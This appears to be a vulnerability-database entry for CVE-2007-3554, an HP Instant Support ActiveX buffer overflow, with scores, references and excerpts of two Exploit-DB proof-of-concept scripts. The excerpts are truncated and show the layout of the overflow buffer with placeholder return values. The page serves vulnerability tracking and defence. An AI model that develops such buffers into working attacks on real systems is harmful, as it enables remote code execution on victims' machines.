CVE-2007-3554
Published: 2007-07-04
CVE-2007-3554: Stack-based buffer overflow in the HPSDDX Class (SDD) ActiveX control in sdd.dll in HP Instant Support - Driver Check before 1.5.0.3 allows remote attackers to…
Priority: P346 | high | 7.6 (CVSS 2.0)
Vector: AV:N/AC:H/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 17.87% (96.8th percentile)
Stack-based buffer overflow in the HPSDDX Class (SDD) ActiveX control in sdd.dll in HP Instant Support - Driver Check before 1.5.0.3 allows remote attackers to execute arbitrary code via a long argument to the queryHub function.
No detection rules found.
Exploit-DB
HP Instant Support - Driver Check Remote Buffer Overflow (PoC)
exploitdb·2007-07-02
---
HP Instant Support - Driver Check Remote Buffer Overflow Exploit
author: Carlo Di Dato (aka shinnai)
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 fully patched with IE7
Special thanks to:
rgod for his support and friendship
John Morris from HP Software Security for his honesty
str0ke... for being str0ke :)
HP Security Bulletin:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01077597
buff = String(222, "A")
get_EBP = "cccc"
get_EIP = unescape("aaaa")
buf1 = unescape("bbbb")
second_exception = unescape("%00%00%92%00")
first_exception = unescape("%00%00%92%00")
buf2 = String(4000, "B")
egg = buff + get_EBP + get_EIP + buf1
Exploit-DB
HP Instant Support - ActiveX Control Driver Check Buffer Overflow
exploitdb·2007-04-01
---
source: https://www.securityfocus.com/bid/24730/info
HP Instant Support ActiveX control is prone to a remote buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
Exploiting this issue allows remote attackers to execute arbitrary code in the context of applications using the affected ActiveX control and possibly to compromise affected computers.
buff = String(222, "A")
get_EBP = "cccc"
get_EIP = unescape("aaaa")
buf1 = unescape("bbbb")
second_exception = unescape("%00%00%92%00")
first_exception = unescape("%00%00%92%00")
buf2 = String(4000, "B")
egg = buff + get_EBP + get_EIP + buf1 + second_exception + fir
No writeups or analysis indexed.
References:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01077597
http://osvdb.org/37832
http://secunia.com/advisories/25918
http://www.securityfocus.com/archive/1/472728/100/0/threaded
http://www.securityfocus.com/bid/24730
http://www.securitytracker.com/id?1018331
http://www.shinnai.altervista.org/index.php?mod=02_Forum&group=Exploits&argument=Remote&topic=1183360239.ff.php&page=last
http://www.vupen.com/english/advisories/2007/2413
https://exchange.xforce.ibmcloud.com/vulnerabilities/35228
Published: 2007-07-04